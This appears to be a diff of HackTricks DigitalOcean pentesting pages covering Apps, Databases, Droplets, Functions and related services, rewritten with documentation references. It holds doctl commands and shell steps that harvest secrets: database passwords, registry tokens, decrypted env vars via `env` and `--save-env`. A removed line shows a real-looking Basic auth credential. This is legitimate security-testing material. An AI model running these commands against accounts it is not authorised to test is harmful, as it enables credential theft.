-curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \
+curl -X POST "https://<api-host>/api/v1/namespaces/<namespace>/actions/<package>/<function>?blocking=true&result=true" \
   -H "Content-Type: application/json" \
-  -H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg="
+  -u "<access-key-id>:<secret-key>"
 ```
 
 ## Logs
 
 ### User logs
 
-The **logs of a user** can be found in [**https://cloud.digitalocean.com/account/activity**](https://cloud.digitalocean.com/account/activity)
+Account events such as logging in or joining a team are available from the account [Activity tab](https://cloud.digitalocean.com/account/activity).<sup>[[16]](#references)</sup>
 
 ### Team logs
 
-The **logs of a team** can be found in [**https://cloud.digitalocean.com/account/security**](https://cloud.digitalocean.com/account/security)
+A team's security history is available from the control panel under **Settings > Security**. Entries record the action, actor, originating IP address, and time for events such as creating or deleting resources and API tokens.<sup>[[16]](#references)</sup>
 
 ## References
 
-- [https://docs.digitalocean.com/products/teams/how-to/manage-membership/](https://docs.digitalocean.com/products/teams/how-to/manage-membership/)
+- [1] [DigitalOcean Product Home](https://docs.digitalocean.com/products/)
+- [2] [AWS Cloud Services](https://aws.amazon.com/products/)
+- [3] [DigitalOcean Teams](https://docs.digitalocean.com/platform/teams/)
+- [4] [How to Create Projects](https://docs.digitalocean.com/products/projects/how-to/create/)
+- [5] [Teams Predefined Roles](https://docs.digitalocean.com/platform/teams/roles/predefined/)
+- [6] [Teams Custom Roles](https://docs.digitalocean.com/platform/teams/roles/custom/)
+- [7] [How to Manage Team Membership](https://docs.digitalocean.com/platform/teams/how-to/manage-membership/)
+- [8] [How to Require Secure Sign In for Teams](https://docs.digitalocean.com/platform/teams/how-to/require-secure-sign-in/)
+- [9] [How to Create a Personal Access Token](https://docs.digitalocean.com/reference/api/create-personal-access-token/)
+- [10] [digitalocean/doctl](https://github.com/digitalocean/doctl)
+- [11] [How to Manage Access to DigitalOcean Spaces](https://docs.digitalocean.com/products/spaces/how-to/manage-access/)
+- [12] [DigitalOcean OAuth API](https://docs.digitalocean.com/reference/api/oauth/)
+- [13] [How to Manage SSH Public Keys on DigitalOcean Teams](https://docs.digitalocean.com/platform/teams/how-to/upload-ssh-keys/)
+- [14] [How to Upload an SSH Public Key to an Existing Droplet](https://docs.digitalocean.com/products/droplets/how-to/add-ssh-keys/to-existing-droplet/)
+- [15] [How to Manage Namespace Access Keys](https://docs.digitalocean.com/products/functions/how-to/manage-namespace-access/)
+- [16] [How to View Security History](https://docs.digitalocean.com/platform/teams/how-to/view-security-history/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md
@@ -1,10 +1,12 @@
 # DO - Permissions for a Pentest
 
+For a read-only review of a team's shared resources, assign the pentester the predefined **Resource Viewer** role. It provides read-only access to shared resources and team settings without billing access. If the test requires changes, prefer **Modifier** when possible because it can modify shared resources but cannot delete them. The **Member** role has full access to shared resources, so grant it only when the agreed scope requires actions unavailable to the less privileged roles. A user's team role also limits the scopes available to their personal API tokens.<sup>[[1]](#references)</sup>
+
+For a narrower least-privilege assignment, create a custom role containing only the permissions required by the test. Custom roles can be created only in the control panel, not through the DigitalOcean API or `doctl`, and they are not automatically updated with permissions for newly released products or features.<sup>[[2]](#references)</sup>
+
+## References
+
+- [1] [Teams Predefined Roles | DigitalOcean Documentation](https://docs.digitalocean.com/platform/teams/roles/predefined/)
+- [2] [Teams Custom Roles | DigitalOcean Documentation](https://docs.digitalocean.com/platform/teams/roles/custom/)
+
 {{#include ../../banners/hacktricks-training.md}}
-
-DO doesn't support granular permissions. So the **minimum role** that allows a user to review all the resources is **member**. A pentester with this permission will be able to perform harmful activities, but it's what it's.
-
-{{#include ../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-services/README.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/README.md
@@ -1,8 +1,6 @@
 # DO - Services
 
-{{#include ../../../banners/hacktricks-training.md}}
-
-DO offers a few services, here you can find how to **enumerate them:**
+DigitalOcean offers compute, data, storage, container and image, networking, and management services. The following sections explain how to **enumerate them:**<sup>[[1]](#references)</sup>
 
 - [**Apps**](do-apps.md)
 - [**Container Registry**](do-container-registry.md)
@@ -16,7 +14,8 @@ DO offers a few services, here you can find how to **enumerate them:**
 - [**Spaces**](do-spaces.md)
 - [**Volumes**](do-volumes.md)
 
+## References
+
+- [1] [DigitalOcean Product Documentation](https://docs.digitalocean.com/products/)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md
@@ -1,37 +1,58 @@
 # DO - Apps
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-[From the docs:](https://docs.digitalocean.com/glossary/app-platform/) App Platform is a Platform-as-a-Service (PaaS) offering that allows developers to **publish code directly to DigitalOcean** servers without worrying about the underlying infrastructure.
+DigitalOcean App Platform is a managed Platform-as-a-Service (PaaS) that deploys applications from Git repositories or container images and handles the underlying build, deployment, scaling, and infrastructure.<sup>[[1]](#references)</sup>
 
-You can run code directly from **github**, **gitlab**, **docker hub**, **DO container registry** (or a sample app).
+An app can use source from GitHub, GitLab, Bitbucket, a public Git repository, DigitalOcean Container Registry (DOCR), Docker Hub, or GitHub Container Registry.<sup>[[2]](#references)</sup>
 
-When defining an **env var** you can set it as **encrypted**. The only way to **retreive** its value is executing **commands** inside the host runnig the app.
+Environment variables can be marked as encrypted. Encryption hides their values from build, deployment, and application logs, but App Platform decrypts them in the runtime environment; users who can access the console or change the app's code or configuration can therefore expose those values.<sup>[[3]](#references)</sup>
 
-An **App URL** looks like this [https://dolphin-app-2tofz.ondigitalocean.app](https://dolphin-app-2tofz.ondigitalocean.app)
+The default domain assigned to an app ends in `.ondigitalocean.app`, for example `https://dolphin-app-2tofz.ondigitalocean.app`.<sup>[[4]](#references)</sup>
 
 ### Enumeration
 
+The official `doctl apps` command group supports listing apps, retrieving app specifications and logs, listing alerts and regions, and opening console sessions.<sup>[[5]](#references)</sup>
+
 ```bash
-doctl apps list # You should get URLs here
-doctl apps spec get <app-id> # Get yaml (including env vars, might be encrypted)
-doctl apps logs <app-id> # Get HTTP logs
+doctl apps list # List apps and their basic details, including default ingress
+doctl apps spec get <app-id> # Get the latest app spec as YAML (default) or JSON
+doctl apps logs <app-id> # Get logs; optionally specify a component and log type
 doctl apps list-alerts <app-id> # Get alerts
-doctl apps list-regions # Get available regions and the default one
+doctl apps list-regions # Get supported regions, availability, and the default
 ```
 
 > [!CAUTION]
-> **Apps doesn't have metadata endpoint**
+> Do not assume that a Droplet-style instance metadata endpoint is available from an App Platform container.
 
 ### RCE & Encrypted env vars
 
-To execute code directly in the container executing the App you will need **access to the console** and go to **`https://cloud.digitalocean.com/apps/<app-id>/console/<app-name>`**.
+With console access, a principal can open an interactive shell in an app component's running container through the control panel, API, or `doctl`; container changes are ephemeral and do not propagate to other instances.<sup>[[6]](#references)</sup>
 
-That will give you a **shell**, and just executing **`env`** you will be able to see **all the env vars** (including the ones defined as **encrypted**).
+DigitalOcean defines `app:access_console` as the permission for accessing App Platform consoles and lists `app:read` as a prerequisite.<sup>[[7]](#references)</sup>
+
+```bash
+doctl apps console <app-id> <component-name> [instance-name]
+```
+
+Because encrypted variables are decrypted at runtime, the shell can print them like any other runtime environment variable.<sup>[[3]](#references)</sup>
+
+```bash
+env
+# or inspect one variable
+printenv <variable-name>
+```
+
+Treat console access and permissions to change app code or configuration as secret-access paths, even though encrypted values remain masked in logs and stored app specifications.<sup>[[3]](#references)</sup>
+
+## References
+
+- [1] [App Platform](https://docs.digitalocean.com/products/app-platform/)
+- [2] [How to Create Apps in App Platform](https://docs.digitalocean.com/products/app-platform/how-to/create-apps/)
+- [3] [How to Use Environment Variables in App Platform](https://docs.digitalocean.com/products/app-platform/how-to/use-environment-variables/)
+- [4] [Reference for App Specification](https://docs.digitalocean.com/products/app-platform/reference/app-spec/)
+- [5] [doctl apps](https://docs.digitalocean.com/reference/doctl/reference/apps/)
+- [6] [How to Access the Console for an App Platform Component](https://docs.digitalocean.com/products/app-platform/how-to/console/)
+- [7] [app:access_console Permission](https://docs.digitalocean.com/platform/teams/roles/permissions/app/access_console/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md
@@ -1,26 +1,28 @@
 # DO - Container Registry
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-DigitalOcean Container Registry is a service provided by DigitalOcean that **allows you to store and manage Docker images**. It is a **private** registry, which means that the images that you store in it are only accessible to you and users that you grant access to. This allows you to securely store and manage your Docker images, and use them to deploy containers on DigitalOcean or any other environment that supports Docker.
+DigitalOcean Container Registry (DOCR) is a **private** registry for storing and managing container images. It integrates with Docker environments and DigitalOcean Kubernetes clusters.<sup>[[1]](#references)</sup>
 
-When creating a Container Registry it's possible to **create a secret with pull images access (read) over it in all the namespaces** of Kubernetes clusters.
+The DigitalOcean Kubernetes control-panel integration can **create a registry pull secret in every namespace** and add it to each namespace's default service account. Workloads that use those service accounts can then pull images from the registry.<sup>[[1]](#references)</sup>
 
 ### Connection
+
+`doctl registry login` configures Docker with authenticated push and pull access; the command also supports a read-only mode.<sup>[[2]](#references)</sup> When authenticating directly with Docker, use the DigitalOcean account's registered email address as the username and an API token as the password.<sup>[[1]](#references)</sup>
 
 ```bash
 # Using doctl
 doctl registry login
 
-# Using docker (You need an API token, use it as username and as password)
+# Using docker with an existing API token
 docker login registry.digitalocean.com
-Username: <paste-api-token>
-Password: <paste-api-token>
+Username: <registered-email>
+Password: <api-token>
 ```
 
 ### Enumeration
+
+`doctl registry docker-config` emits a Docker authentication configuration with read-only credentials by default; its output contains an API token and must be handled as sensitive data.<sup>[[3]](#references)</sup> `doctl registry repository list-v2` retrieves repository metadata such as names, latest tags, and tag and manifest counts.<sup>[[4]](#references)</sup>
 
 ```bash
 # Get creds to access the registry from the API
@@ -30,7 +32,13 @@ doctl registry docker-config
 doctl registry repository list-v2
 ```
 
-{{#include ../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [How to Use Your Private DigitalOcean Container Registry with Docker and Kubernetes](https://docs.digitalocean.com/products/container-registry/how-to/use-registry-docker-kubernetes/)
+- [2] [doctl registry login](https://docs.digitalocean.com/reference/doctl/reference/registry/login/)
+- [3] [doctl registry docker-config](https://docs.digitalocean.com/reference/doctl/reference/registry/docker-config/)
+- [4] [doctl registry repository list-v2](https://docs.digitalocean.com/reference/doctl/reference/registry/repository/list-v2/)
+
+{{#include ../../../banners/hacktricks-training.md}}
 
 

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md
@@ -1,46 +1,59 @@
 # DO - Databases
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-With DigitalOcean Databases, you can easily **create and manage databases in the cloud** without having to worry about the underlying infrastructure. The service offers a variety of database options, including **MySQL**, **PostgreSQL**, **MongoDB**, and **Redis**, and provides tools for administering and monitoring your databases. DigitalOcean Databases is designed to be highly scalable, reliable, and secure, making it an ideal choice for powering modern applications and websites.
+DigitalOcean Managed Databases provides managed database clusters with backups, TLS encryption, automated failover, and VPC networking. The currently documented engines are **PostgreSQL**, **MySQL**, **Kafka**, **MongoDB**, **Valkey**, and **OpenSearch**.<sup>[[1]](#references)</sup>
 
-### Connections details
+### Connection details
 
-When creating a database you can select to configure it **accessible from a public network**, or just from inside a **VPC**. Moreover, it request you to **whitelist IPs that can access it** (your IPv4 can be one).
+The control panel provides connection details for the cluster's public and private hostnames. Only resources in the same VPC can use the private hostname. Inbound access can be restricted with **trusted sources**, including specific IP addresses or CIDR ranges and selected DigitalOcean resources.<sup>[[2]](#references)[[3]](#references)</sup>
 
-The **host**, **port**, **dbname**, **username**, and **password** are shown in the **console**. You can even download the AD certificate to connect securely.
+Connection details include the **host**, **port**, **database**, **username**, **password**, and TLS settings. PostgreSQL Standard Edition clusters provide a downloadable CA certificate for full server verification with `sslmode=verify-full`; Advanced Edition uses the system trust store instead.<sup>[[2]](#references)</sup>
 
 ```bash
-sql -h db-postgresql-ams3-90864-do-user-2700959-0.b.db.ondigitalocean.com -U doadmin -d defaultdb -p 25060
+PGPASSWORD=<password> \
+PGSSLMODE=verify-full \
+PGSSLROOTCERT=<path-to-ca-certificate> \
+psql -U doadmin -h <cluster-hostname> -p <cluster-port> -d defaultdb
 ```
 
 ### Enumeration
 
+The following `doctl` commands enumerate clusters, connection details, databases, trusted-source firewall rules, backups, and connection pools.<sup>[[4]](#references)</sup> The cluster-details command includes a connection URI, while the connection command returns connection parameters and supports `--private` for VPC connection details.<sup>[[5]](#references)[[6]](#references)</sup> Treat the output as sensitive: the user-list command returns usernames, roles, and passwords.<sup>[[7]](#references)</sup> The CA certificate can also be retrieved with `doctl`.<sup>[[8]](#references)</sup>
+
 ```bash
-# Databse clusters
+# Database clusters
 doctl databases list
 
-# Auth
-doctl databases get <db-id> # This shows the URL with CREDENTIALS to access
-doctl databases connection <db-id> # Another way to egt credentials
-doctl databases user list <db-id> # Get all usernames and passwords
+# Cluster and connection details
+doctl databases get <cluster-id> # Includes the connection URI
+doctl databases connection <cluster-id> # Includes public connection credentials
+doctl databases connection <cluster-id> --private # Use the VPC hostname
+doctl databases user list <cluster-id> # Lists users, roles, and passwords
+doctl databases get-ca <cluster-id> # Retrieve the cluster CA certificate
 
-# Dbs inside a database cluster
+# Databases inside a cluster
 doctl databases db list <cluster-id>
 
-# Firewall (allowed IPs), you can also add
+# Firewall rules (trusted sources)
 doctl databases firewalls list <cluster-id>
 
 # Backups
-doctl databases backups <db-id> # List backups of DB
+doctl databases backups <cluster-id>
 
-# Pools
-doctl databases pool list <db-id> # List pools of DB
+# Connection pools
+doctl databases pool list <cluster-id>
 ```
 
+## References
+
+- [1] [Managed Databases](https://docs.digitalocean.com/products/databases/)
+- [2] [How to Connect to PostgreSQL Database Clusters](https://docs.digitalocean.com/products/databases/postgresql/how-to/connect/)
+- [3] [How to Secure PostgreSQL Managed Database Clusters](https://docs.digitalocean.com/products/databases/postgresql/how-to/secure/)
+- [4] [Command Line Interface (CLI) Reference for doctl](https://docs.digitalocean.com/reference/doctl/reference/)
+- [5] [doctl databases get](https://docs.digitalocean.com/reference/doctl/reference/databases/get/)
+- [6] [doctl databases connection](https://docs.digitalocean.com/reference/doctl/reference/databases/connection/)
+- [7] [doctl databases user list](https://docs.digitalocean.com/reference/doctl/reference/databases/user/list/)
+- [8] [doctl databases get-ca](https://docs.digitalocean.com/reference/doctl/reference/databases/get-ca/)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md
@@ -1,39 +1,33 @@
 # DO - Droplets
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-In DigitalOcean, a "droplet" is a v**irtual private server (VPS)** that can be used to host websites and applications. A droplet is a **pre-configured package of computing resources**, including a certain amount of CPU, memory, and storage, that can be quickly and easily deployed on DigitalOcean's cloud infrastructure.
+In DigitalOcean, a **Droplet** is a Linux-based virtual machine (VM). Its plan determines resources such as CPU, memory, and storage.<sup>[[1]](#references)</sup>
 
-You can select from **common OS**, to **applications** already running (such as WordPress, cPanel, Laravel...), or even upload and use **your own images**.
+During creation, the image can be a base operating system, a preconfigured Marketplace application, a custom image, or an existing backup or snapshot.<sup>[[1]](#references)</sup>
 
-Droplets support **User data scripts**.
+Droplets support **user data** during creation. On images with `cloud-init`, the data can be a cloud-config document or script that runs as root on first boot; it cannot be changed after the Droplet is created.<sup>[[2]](#references)</sup>
 
 <details>
 
 <summary>Difference between a snapshot and a backup</summary>
 
-In DigitalOcean, a snapshot is a point-in-time copy of a Droplet's disk. It captures the state of the Droplet's disk at the time the snapshot was taken, including the operating system, installed applications, and all the files and data on the disk.
+Snapshots are on-demand disk images that save the current contents of a Droplet's disk. They can be used to create another Droplet with the same contents. DigitalOcean recommends powering the Droplet off first when application consistency matters, because a live snapshot can capture data that has not been fully written to disk.<sup>[[3]](#references)</sup>
 
-Snapshots can be used to create new Droplets with the same configuration as the original Droplet, or to restore a Droplet to the state it was in when the snapshot was taken. Snapshots are stored on DigitalOcean's object storage service, and they are incremental, meaning that only the changes since the last snapshot are stored. This makes them efficient to use and cost-effective to store.
+Backups are automatically created system-level disk images. Depending on the selected plan, DigitalOcean can create them weekly, daily, or several times per day. A backup can be used as the image for a new Droplet or restored over the original Droplet, which discards changes made after that backup.<sup>[[4]](#references)</sup>
 
-On the other hand, a backup is a complete copy of a Droplet, including the operating system, installed applications, files, and data, as well as the Droplet's settings and metadata. Backups are typically performed on a regular schedule, and they capture the entire state of a Droplet at a specific point in time.
-
-Unlike snapshots, backups are stored in a compressed and encrypted format, and they are transferred off of DigitalOcean's infrastructure to a remote location for safekeeping. This makes backups ideal for disaster recovery, as they provide a complete copy of a Droplet that can be restored in the event of data loss or other catastrophic events.
-
-In summary, snapshots are point-in-time copies of a Droplet's disk, while backups are complete copies of a Droplet, including its settings and metadata. Snapshots are stored on DigitalOcean's object storage service, while backups are transferred off of DigitalOcean's infrastructure to a remote location. Both snapshots and backups can be used to restore a Droplet, but snapshots are more efficient to use and store, while backups provide a more comprehensive backup solution for disaster recovery.
+The practical distinction is therefore **manual/on-demand snapshots** versus **scheduled, automatically retained backups**. Both are disk images rather than exports of all account-level settings.
 
 </details>
 
 ### Authentication
 
-For authentication it's possible to **enable SSH** through username and **password** (password defined when the droplet is created). Or **select one or more of the uploaded SSH keys**.
+At creation time, SSH authentication can use a password chosen for the new Droplet or one or more public SSH keys stored on the DigitalOcean team. DigitalOcean recommends SSH keys over passwords.<sup>[[1]](#references)</sup>
 
 ### Firewall
 
 > [!CAUTION]
-> By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**.
+> A Droplet can have no DigitalOcean Cloud Firewall attached. Check the Droplet's **Networking** tab and create or attach a Cloud Firewall when network-level filtering is required; the attached firewall rules are separate from any host firewall.<sup>[[5]](#references)</sup>
 
 More info in:
 
@@ -42,6 +36,8 @@ do-networking.md
 {{#endref}}
 
 ### Enumeration
+
+The following commands use DigitalOcean's official `doctl` CLI to list Droplets and related resources or invoke supported Droplet actions.<sup>[[6]](#references)</sup>
 
 ```bash
 # VMs
@@ -70,15 +66,25 @@ doctl compute snapshot list
 ```
 
 > [!CAUTION]
-> **Droplets have metadata endpoints**, but in DO there **isn't IAM** or things such as role from AWS or service accounts from GCP.
+> Droplets can query the metadata service at `169.254.169.254`. Its documented data includes the Droplet ID, hostname, user data, vendor data, public SSH keys, region, interfaces, DNS configuration, reserved IP information, and tags; the complete API index does not expose an instance-role or service-account credential endpoint. Treat metadata access as sensitive, particularly when testing SSRF.<sup>[[7]](#references)[[8]](#references)</sup>
 
 ### RCE
 
-With access to the console it's possible to **get a shell inside the droplet** accessing the URL: **`https://cloud.digitalocean.com/droplets/<droplet-id>/terminal/ui/`**
+An authorized control-panel user can open the Droplet's **Web Console** for browser-based shell access. This console uses the Droplet agent and SSH, so the Droplet must have a public address and its network controls must allow the configured SSH port.<sup>[[9]](#references)</sup>
 
-It's also possible to launch a **recovery console** to run commands inside the host accessing a recovery console in **`https://cloud.digitalocean.com/droplets/<droplet-id>/console`**(but in this case you will need to know the root password).
+The **Recovery Console** provides out-of-band access even when networking or `sshd` is broken, but it requires a password for a local account. A control-panel user can reset the root password and receive a temporary password by email, then launch the console from the Droplet's **Settings** tab.<sup>[[10]](#references)</sup>
+
+## References
+
+- [1] [How to Create a Droplet](https://docs.digitalocean.com/products/droplets/how-to/create/)
+- [2] [How to Provide User Data During Droplet Creation](https://docs.digitalocean.com/products/droplets/how-to/provide-user-data/)
+- [3] [How to Create Snapshots of Droplets](https://docs.digitalocean.com/products/snapshots/how-to/snapshot-droplets/)
+- [4] [How to Create or Restore Droplets from Backups](https://docs.digitalocean.com/products/backups/how-to/create-and-restore/)
+- [5] [How to View All Firewall Rules Applied to a Droplet](https://docs.digitalocean.com/products/networking/firewalls/how-to/view-rules-for-droplet/)
+- [6] [Command Line Interface (CLI) Reference for doctl](https://docs.digitalocean.com/reference/doctl/reference/)
+- [7] [How to Access Information about a Droplet using the Metadata API](https://docs.digitalocean.com/products/droplets/how-to/access-metadata/)
+- [8] [Droplet Properties](https://docs.digitalocean.com/reference/api/metadata/droplet-properties/)
+- [9] [How to Connect to Droplets with the Droplet Console](https://docs.digitalocean.com/products/droplets/how-to/connect-with-console/)
+- [10] [How to Recover Access to Droplets using the Recovery Console](https://docs.digitalocean.com/products/droplets/how-to/recovery/recovery-console/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md
@@ -1,39 +1,37 @@
 # DO - Functions
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-DigitalOcean Functions, also known as "DO Functions," is a serverless computing platform that lets you **run code without having to worry about the underlying infrastructure**. With DO Functions, you can write and deploy your code as "functions" that can be **triggered** via **API**, **HTTP requests** (if enabled) or **cron**. These functions are executed in a fully managed environment, so you **don't need to worry** about scaling, security, or maintenance.
+DigitalOcean Functions, also known as "DO Functions," is a serverless computing platform that lets you **run code without managing the underlying infrastructure**. Functions can be invoked through the **authenticated REST API**, exposed as **web functions** for normal HTTP requests, or attached to scheduled triggers that use **cron** expressions.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
-In DO, to create a function first you need to **create a namespace** which will be **grouping functions**.\
-Inside the namespace you can then create a function.
+Functions and packages are deployed into a **namespace**, and `doctl` connects to one namespace at a time.<sup>[[4]](#references)</sup>
 
 ### Triggers
 
-The way **to trigger a function via REST API** (always enabled, it's the method the cli uses) is by triggering a request with an **authentication token** like:
+A function remains accessible through the **authenticated REST API** even when its web-function setting is disabled. Direct REST invocation uses the namespace API host and a namespace access key, as in this request:<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
-curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \
+curl -X POST "https://<api-host>/api/v1/namespaces/<namespace>/actions/<package>/<function>?blocking=true&result=true" \
   -H "Content-Type: application/json" \
-  -H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg="
+  -u "<access-key-id>:<secret-key>"
 ```
 
-To see how is the **`doctl`** cli tool getting this token (so you can replicate it), the **following command shows the complete network trace:**
+To observe how **`doctl`** connects to the namespace and obtains the credentials used for direct invocation, enable its network trace:<sup>[[1]](#references)[[5]](#references)</sup>
 
 ```bash
 doctl serverless connect --trace
 ```
 
-**When HTTP trigger is enabled**, a web function can be invoked through these **HTTP methods GET, POST, PUT, PATCH, DELETE, HEAD and OPTIONS**.
+When the **web-function** setting is enabled, the function accepts **GET, POST, PUT, PATCH, DELETE, HEAD, and OPTIONS**. Web functions are public by default unless Secure Web Function is enabled, in which case callers must provide the configured secret in the `X-Require-Whisk-Auth` header.<sup>[[2]](#references)</sup>
 
 > [!CAUTION]
-> In DO functions, **environment variables cannot be encrypted** (at the time of this writing).\
-> I couldn't find any way to read them from the CLI but from the console it's straight forward.
+> Treat access to function metadata as potential access to secrets: `doctl serverless functions get` supports `--save-env` and `--save-env-json` to export a deployed function's environment variables. Functions deployed through App Platform can instead template `project.yml` values from App Platform's encrypted variables.<sup>[[7]](#references)[[9]](#references)</sup>
 
-**Functions URLs** look like this: `https://<random>.doserverless.co/api/v1/web/<namespace-id>/default/<function-name>`
+**Function URLs** look like this: `https://<random>.doserverless.co/api/v1/web/<namespace-id>/<package-name>/<function-name>`. The exact URL can be retrieved with `doctl serverless functions get <func-name> --url`.<sup>[[7]](#references)[[10]](#references)</sup>
 
 ### Enumeration
+
+The following commands enumerate namespaces, inspect and invoke functions in the connected namespace, and retrieve activation records, logs, and results.<sup>[[4]](#references)[[6]](#references)[[8]](#references)</sup>
 
 ```bash
 # Namespace
@@ -51,13 +49,25 @@ doctl serverless activations get <activation-id> # Get all the info about execut
 doctl serverless activations logs <activation-id> # get only the logs of execution
 doctl serverless activations result <activation-id> # get only the response result of execution
 
-# I couldn't find any way to get the env variables form the CLI
+# Export a function's environment variables
+doctl serverless functions get <func-name> --save-env <output-file>
+doctl serverless functions get <func-name> --save-env-json <output-file>
 ```
 
 > [!CAUTION]
 > There **isn't metadata endpoint** from the Functions sandbox.
 
+## References
+
+- [1] [Functions API Reference](https://docs.digitalocean.com/reference/api/reference/functions/)
+- [2] [How to Configure Functions](https://docs.digitalocean.com/products/functions/how-to/configure-functions/)
+- [3] [How to Schedule Functions](https://docs.digitalocean.com/products/functions/how-to/schedule-functions/)
+- [4] [doctl serverless namespaces](https://docs.digitalocean.com/reference/doctl/reference/serverless/namespaces/)
+- [5] [doctl serverless connect](https://docs.digitalocean.com/reference/doctl/reference/serverless/connect/)
+- [6] [doctl serverless functions](https://docs.digitalocean.com/reference/doctl/reference/serverless/functions/)
+- [7] [doctl serverless functions get](https://docs.digitalocean.com/reference/doctl/reference/serverless/functions/get/)
+- [8] [doctl serverless activations](https://docs.digitalocean.com/reference/doctl/reference/serverless/activations/)
+- [9] [Project Configuration YAML File](https://docs.digitalocean.com/products/functions/reference/project-configuration/)
+- [10] [How to Develop Functions](https://docs.digitalocean.com/products/functions/how-to/develop-functions/)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md
@@ -1,22 +1,24 @@
 # DO - Images
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-DigitalOcean Images are **pre-built operating system or application images** that can be used to create new Droplets (virtual machines) on DigitalOcean. They are similar to virtual machine templates, and they allow you to **quickly and easily create new Droplets with the operating system** and applications that you need.
+DigitalOcean Images are reusable disk images from which new Droplets can be created. DigitalOcean distinguishes five image types: distribution images, preconfigured 1-Click Applications, uploaded custom images, on-demand snapshots, and automatically created backups.<sup>[[1]](#references)</sup>
 
-DigitalOcean provides a wide range of Images, including popular operating systems such as Ubuntu, CentOS, and FreeBSD, as well as pre-configured application Images such as LAMP, MEAN, and LEMP stacks. You can also create your own custom Images, or use Images from the community.
+Distribution images provide a public operating-system base, while 1-Click Applications add preconfigured software. Custom images let users upload supported Linux-based virtual machine images. Snapshots capture a Droplet on demand, whereas backups capture it automatically at regular intervals when backups are enabled.<sup>[[1]](#references)</sup>
 
-When you create a new Droplet on DigitalOcean, you can choose an Image to use as the basis for the Droplet. This will automatically install the operating system and any pre-installed applications on the new Droplet, so you can start using it right away. Images can also be used to create snapshots and backups of your Droplets, so you can easily create new Droplets from the same configuration in the future.
+Choosing an image when creating a Droplet reuses the operating system, preinstalled applications, or saved Droplet state represented by that image.<sup>[[1]](#references)</sup>
 
 ### Enumeration
+
+The following command lists the private images in the current account. Add `--public` to list public images; the output identifies each image and includes fields such as its type, distribution, slug, visibility, and minimum required disk size.<sup>[[2]](#references)</sup>
 
 ```
 doctl compute image list
 ```
 
+## References
+
+- [1] [doctl compute image](https://docs.digitalocean.com/reference/doctl/reference/compute/image/)
+- [2] [doctl compute image list](https://docs.digitalocean.com/reference/doctl/reference/compute/image/list/)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md
@@ -1,19 +1,19 @@
 # DO - Kubernetes (DOKS)
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
 ### DigitalOcean Kubernetes (DOKS)
 
-DOKS is a managed Kubernetes service offered by DigitalOcean. The service is designed to **deploy and manage Kubernetes clusters on DigitalOcean's platform**. The key aspects of DOKS include:
+DOKS is DigitalOcean's managed Kubernetes service. It provides a fully managed control plane and integrates with standard Kubernetes tooling and other DigitalOcean products.<sup>[[1]](#references)</sup> Key aspects include:
 
-1. **Ease of Management**: The requirement to set up and maintain the underlying infrastructure is eliminated, simplifying the management of Kubernetes clusters.
-2. **User-Friendly Interface**: It provides an intuitive interface that facilitates the creation and administration of clusters.
-3. **Integration with DigitalOcean Services**: It seamlessly integrates with other services provided by DigitalOcean, such as Load Balancers and Block Storage.
-4. **Automatic Updates and Upgrades**: The service includes the automatic updating and upgrading of clusters to ensure they are up-to-date.
